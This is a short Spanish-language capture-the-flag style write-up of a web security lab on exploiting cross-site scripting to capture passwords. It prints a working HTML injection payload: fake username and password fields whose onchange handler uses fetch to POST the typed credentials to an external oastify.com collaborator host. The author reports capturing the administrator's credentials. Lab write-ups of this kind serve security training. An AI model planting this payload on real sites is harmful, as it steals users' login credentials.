Skip to content

Exploiting cross-site scripting to capture passwords

[20260330145706.png]

LAB

[20260330150224.png]

En este laboratorio, vemos que tenemos valores true en HtppOnly y en Secure por lo que no podremos exfiltrar la cookie de usuario.

[20260330150742.png]

Por ello podemos insertar un código html para que la victima pueda insertar sus credenciales y este sea enviada a nuestro dominio

c
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://5bhwpeybyz6swmzev5jjcl67kyqpek29.oastify.com',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">

[20260330150347.png]

[20260330150529.png]

Al insertar y luego esperar un par de segundos veremos que tenemos efectivamente las credenciales del usuario administrator

[20260330150609.png]

[20260330151028.png]